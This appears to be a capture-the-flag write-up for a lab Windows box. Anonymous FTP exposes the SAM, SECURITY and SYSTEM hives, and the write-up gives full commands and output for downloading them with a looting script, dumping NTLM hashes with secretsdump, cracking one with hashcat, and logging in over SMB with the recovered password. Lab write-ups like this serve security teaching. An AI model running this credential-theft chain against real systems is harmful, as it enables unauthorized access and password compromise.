The Art of Evasion & Persistence - I
192.168.1.22OWASPKL{xxx}1. Challenge Overview
Windows box exposing FTP and SMB. The path:
Anonymous FTP (active mode) exposes the SAM, SECURITY, SYSTEM registry hives.
Dump NTLM hashes offline on Kali, crack webadmin.
Use the cracked creds over SMB to read webadmin\Desktop\local.txt.
2. Initial Reconnaissance
2.1 Port scan
1nmap -sC -sV -p- -T4 192.168.1.22 -oA art1_nmap_full1PORT STATE SERVICE VERSION221/tcp open ftp FileZilla ftpd 1.12.63445/tcp open microsoft-ds?48080/tcp open http Apache httpd 2.4.583. Analysis / Forensics Path
3.1 Enumerate anonymous FTP and find the hives
Anonymous login is allowed. Passive listing hung, so I forced active mode and listed the root — three Windows registry hives are exposed.
1python3 -c "2from ftplib import FTP3ftp=FTP('192.168.1.22'); print(ftp.getwelcome())4print(ftp.login('anonymous','anonymous@test'))5ftp.set_pasv(False) # active mode (passive hangs vs this FileZilla)6ftp.retrlines('LIST'); ftp.quit()"1220-FileZilla Server 1.12.62230 Login successful.3-r--r--r-- 1 ftp ftp 81920 May 26 13:21 SAM4-r--r--r-- 1 ftp ftp 24576 May 26 13:21 SECURITY5-r--r--r-- 1 ftp ftp 11456512 May 26 13:21 SYSTEM3.2 Download the hives
The helper (payloads/ftp_active_hive_loot.py) repeats the same anonymous + active-mode session and RETRs the three files into loot/:
1ftp = FTP('192.168.1.22'); ftp.login('anonymous','anonymous@test')2ftp.set_pasv(False) # active mode3for fn in ('SAM','SECURITY','SYSTEM'):4 ftp.retrbinary(f'RETR {fn}', open(f'loot/{fn}','wb').write)1./payloads/ftp_active_hive_loot.py1[*] Connected and switched to active mode2[+] Downloaded SAM -> loot/SAM (81920 bytes)3[+] Downloaded SECURITY -> loot/SECURITY (24576 bytes)4[+] Downloaded SYSTEM -> loot/SYSTEM (11456512 bytes)3.3 Dump NTLM hashes offline
1impacket-secretsdump -sam loot/SAM -security loot/SECURITY -system loot/SYSTEM LOCAL1[*] Target system bootKey: 0x9bb8173d4c12219685e7f526ff8e77352Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::3webadmin:1002:aad3b435b51404eeaad3b435b51404ee:97d15e7e19988b89622647e0c2a5f2a1:::4. Exploitation / Recovery
4.1 Crack the webadmin NTLM hash
1printf '97d15e7e19988b89622647e0c2a5f2a1\n' > loot/webadmin_nt.txt2hashcat -m 1000 -a 0 loot/webadmin_nt.txt /usr/share/wordlists/rockyou.txt3hashcat -m 1000 loot/webadmin_nt.txt --show197d15e7e19988b89622647e0c2a5f2a1:webhead22904.2 Read the flag over SMB
1smbclient //192.168.1.22/Users -U 'webadmin%webhead2290' -c 'cd webadmin/Desktop; ls; get local.txt proof/local.txt'2cat proof/local.txt1\webadmin\Desktop2 local.txt A 42 ...3OWASPKL{b955142d1496bc8d6f0d5b16f014666}> Re-validated live (full chain) on 2026-05-31 via Kali (192.168.1.10): anonymous active-mode FTP pulled SAM/SECURITY/SYSTEM, secretsdump returned webadmin:...:97d15e7e19988b89622647e0c2a5f2a1, hashcat cracked it to webhead2290, and smbclient //192.168.1.22/Users -U 'webadmin%webhead2290' downloaded webadmin\Desktop\local.txt (42 bytes) -> flag above.
5. Flag
6. Summary of Approach & Key Takeaways
FTP anonymous access exposed backup registry hives.
Active-mode FTP bypassed the passive listing/download hang.
Offline secretsdump recovered the webadmin NTLM hash.
hashcat cracked it to webhead2290.
SMB with the cracked creds read local.txt. No binary executed on target.
Never expose SAM/SECURITY/SYSTEM over anonymous FTP — that is full offline credential disclosure.
When passive FTP hangs against Windows, switch to active mode.